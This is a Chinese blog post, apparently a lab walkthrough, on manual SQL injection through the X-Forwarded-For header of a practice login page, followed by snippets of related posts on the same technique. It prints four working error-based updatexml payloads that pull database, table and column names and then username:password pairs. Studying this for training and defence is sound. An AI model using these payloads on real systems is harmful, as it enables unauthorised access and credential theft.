x-forwarded-for手工注入(超详细)

最新推荐文章于 2024-07-29 01:38:46 发布
最新推荐文章于 2024-07-29 01:38:46 发布
阅读量1.1k 收藏 1
点赞数
文章标签: web安全 渗透测试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jinzezhi/article/details/124742314
版权

使用靶场来进行演示。

访问靶场后看到的是一个常见的后台的登录框,第一步肯定是先试一下看看有没有弱口令咯,试了几个发现并不存在弱口令,但是发现网站有一串乱码的弹窗如下

虽然是乱码,但是看到里面有ip,头发短见识多得我就想到了这大概率是记录下了我本机的ip(这里的ip是开了隧道的不是我的哦~)让我们来抓包看一下

 这里可以看到转编码之后确实是记录了我的ip,但是在请求包中没有发现xff头,就很奇怪,自己加上。

发现xff头的内容是可以随便控制的,下面可以看到输入单引号是报错的,那就直接尝试报错注入

获取到数据库名称

',updatexml(1,concat(0x7e,(select database()),0x7e),1))#

获取到表名

' or updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='webcalendar'),0x7e),1))#

 获取到字段名

' or updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='user'),0x7e),1))#

 最后获取到数据是账号和密码

' or updatexml(1,concat(0x7e,(select group_concat(username,':',password)from user limit 0,1),0x7e),1))#

 

拿着获取到的账号密码返回登录框进行登录获取到key 

不要一味局限于使用工具...

@A1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院-HTTP头注入漏洞测试(X-Forwarded-for)-手工注入
mutou990的博客
08-03 1560
一、审题 这题从题目,也可以看放包后的回显可以知道是http头的ip注入,尝试(题目有说)x-forwarded-for(这里的注入我很难主动想到,因为在原始的http头里没有x-forwarded-for,这题是题目有提醒) 二、判断类型 使用brupsuit抓包,repeater后添加XFF头 ——X-Forwarded-For: 通过修改X-Forwarded-For:值来找出注入点。 当值为"(双引号)时,X-Forwarded-For:" 不报错; 当值为‘’(单引号)时,X-Forwarded
X-Forwarded-For火狐插件
01-10
X-Forwarded-For火狐插件
Chrome插件:X-Forwarded-For Header
12-15
X-Forwarded-For Header插件,此扩展允许您快速设置X-Forwarded-For HTTP标头
简单了解SQL宽字节注入与httpXFF注入(基于sqllabs演示)
Welcome To Myon'Blog !
12-29 955
HTTP XFF注入(X-Forwarded-For Injection),攻击者在HTTP请求中伪造XFF头,将恶意代码注入到HTTP请求头中,从而执行SQL注入攻击。提示我们输入的单引号被转义符 \ 进行了转义,即转义符自动的出现在输入的特殊字符前面,这是防止sql注入的一种方法,导致无法产生报错。因为这里并没有看到关于我们输入的1,2,3的回显位置,因此采用报错注入。至此,关于SQL注入的内容全部结束,后续我们将进入其他Web漏洞的学习。使用单引号尝试闭合,出现SQL语句报错,因此确实存在注入
攻防世界-xff_referer
MateSnake的博客
05-11 344
攻防世界-xff_referer
SQL注入之X-Forwarded-For注入漏洞
随 风
03-02 730
X-Forwarded-For注入漏洞
墨者 X-Forwarded-For注入漏洞
m0_52920608的博客
11-07 243
PS:这里也可以BP修改X-Forwarded-For参数, 手工报错注入updatexml函数 一步一步爆出数据,得到数据。我这里使用的sqlmap 1.打开后发现是登录界面,题目提示X-Forwarded-For,抓包: 在网站登陆处抓包,发现提示IP已被记录修改X-Forwarded-For发现ip改变,说明X-Forwarded-For字段的内容可控,且很有可能保存在数据库当中 2.将数据包保存为TXT文件(我这里保存名字为xff.txt),并将X-Forwarded-For字段内容置为*,提示s
墨者学院09 X-Forwarded-For注入漏洞实战
weixin_42789937的博客
02-10 564
墨者学院09 X-Forwarded-For注入漏洞实战,参考大佬wp,对于显错注入整理了手工和sqlmap两种注入流程~
墨者学院-X-Forwarded-For注入漏洞实战
weixin_38131137的博客
03-02 414
这题怎么说呢,网上普遍的做法是当成xff来做,sqlmap直接爆破,这种方式还没有去尝试,但是难度不大,这里主要讲手工注入,对于sqlmap爆破的先不进行尝试。 开始注入: 一、审题 这题从题目,也可以看放包后的回显可以知道是http头的ip注入,尝试(题目有说)x-forwarded-for(这里的注入我很难主动想到,因为在原始的http头里没有x-forwarded-for,这题是题目有提醒)...
HTTP头注入漏洞测试(X-Forwarded-for)
weixin_47493074的博客
09-26 163
HTTP头注入漏洞测试(X-Forwarded-for)
当cityblog遇到X-Forwarded-For
weixin_33905756的博客
11-28 119
当cityblog遇到X-Forwarded-For寂寞的刺猬[L.S.T] 从本文你可以学到:1、cityblog跨站漏洞2、cityblog注射漏洞 注:cityblog(都市自媒体)是cixiblog(慈溪博客)的升级版本。 cityblog(都市自媒体)是一款支持多用户的博客系统,而X-Forwarded-For则是代理IP的意思。自从X-Forwarded-For被牛人挖掘出利用的...
X-Forwarded-For Header-crx插件
04-02
此扩展允许您快速更新X-Forwarded-For,X-Originating-IP,X-Remote-IP和X-Remote-Addr HTTP标头,以进行各种测试。 变更日志:v0.6.2-修复了干扰此扩展的Firefox版本的错误v0.6.1-修复了CORS预检请求的问题v0.6.0-...
forwarded:解析HTTP X-Forwarded-For标头
05-11
从请求中解析X-Forwarded-For标头。 以相反的顺序返回地址数组,包括req的套接字地址(即索引0是套接字地址,最后一个索引是最远的地址,通常是最终用户)。 测验 $ npm test 执照 麻省理工学院
x-forwarded-forheader1.0.1.1.1
05-01
x-forwarded-forheader1.0.1.1.1火狐老插件,可以直接本地安装在旧版火狐上面,可以用的。
web十大漏洞--sql注入
m0_71907084的博客
10-30 1506
例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 829
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
WEB安全】 PHP基础完整教学上(详细
weixin_60838266的博客
07-28 726
本文为Web安全学习中需要了解的php知识提高学习,PHP:Hypertext Preprocessor,中文名:“文本预处理器”是一种通用开源脚本语言。语法吸收了C语言、java和Perl的特点,利于学习,使用广泛,主要适用于web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用)文档中去执行,执行效率比完全生成HTML标记的CGI要高许多;PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
WEB安全】 PHP基础文件知识完整教学中(详细
最新发布
weixin_60838266的博客
07-29 616
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
x-forwarded-for注入漏洞
03-16
x-forwarded-for注入漏洞是一种网络安全漏洞,攻击者可以通过伪造HTTP请求头中的x-forwarded-for字段,来欺骗服务器认为请求来自于受信任的IP地址,从而绕过IP地址过滤等安全措施,进而进行攻击。这种漏洞常见于代理服务器、负载均衡器等中间件设备。为了防范此类漏洞,应该对HTTP请求头进行严格的过滤和验证,确保请求来源的合法性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值